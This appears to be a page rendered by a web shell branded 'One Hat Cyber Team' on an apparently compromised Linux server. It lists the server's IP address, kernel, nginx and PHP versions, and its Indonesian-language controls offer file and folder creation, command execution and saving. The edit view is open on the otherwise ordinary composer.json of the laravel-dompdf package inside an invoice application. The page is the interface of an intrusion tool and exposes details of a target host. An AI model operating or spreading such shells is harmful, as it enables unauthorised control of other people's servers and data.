⚝
One Hat Cyber Team
⚝
Your IP:
216.73.216.1
Server IP:
185.238.29.86
Server:
Linux server2 6.8.12-6-pve #1 SMP PREEMPT_DYNAMIC PMX 6.8.12-6 (2024-12-19T19:05Z) x86_64
Server Software:
nginx/1.18.0
PHP Version:
8.1.31
Buat File
|
Buat Folder
Eksekusi
Dir :
~
/
var
/
www
/
invoice
/
vendor
/
barryvdh
/
laravel-dompdf
/
Edit File: composer.json
{ "name": "barryvdh/laravel-dompdf", "description": "A DOMPDF Wrapper for Laravel", "license": "MIT", "keywords": ["laravel", "dompdf", "pdf"], "authors": [ { "name": "Barry vd. Heuvel", "email": "barryvdh@gmail.com" } ], "require": { "php": "^7.2 || ^8.0", "dompdf/dompdf": "^1.2.1", "illuminate/support": "^6|^7|^8|^9" }, "require-dev": { "orchestra/testbench": "^4|^5|^6|^7", "squizlabs/php_codesniffer": "^3.5", "phpro/grumphp": "^1", "nunomaduro/larastan": "^1|^2" }, "autoload": { "psr-4": { "Barryvdh\\DomPDF\\": "src" } }, "autoload-dev": { "psr-4": { "Barryvdh\\DomPDF\\Tests\\": "tests" } }, "extra": { "branch-alias": { "dev-master": "1.0-dev" }, "laravel": { "providers": [ "Barryvdh\\DomPDF\\ServiceProvider" ], "aliases": { "PDF": "Barryvdh\\DomPDF\\Facade\\Pdf" } } }, "scripts": { "test": "phpunit", "check-style": "phpcs -p --standard=psr12 src/", "fix-style": "phpcbf -p --standard=psr12 src/", "phpstan": "phpstan analyze --memory-limit=-1" }, "minimum-stability": "dev", "prefer-stable": true, "config": { "allow-plugins": { "phpro/grumphp": true } } }
Simpan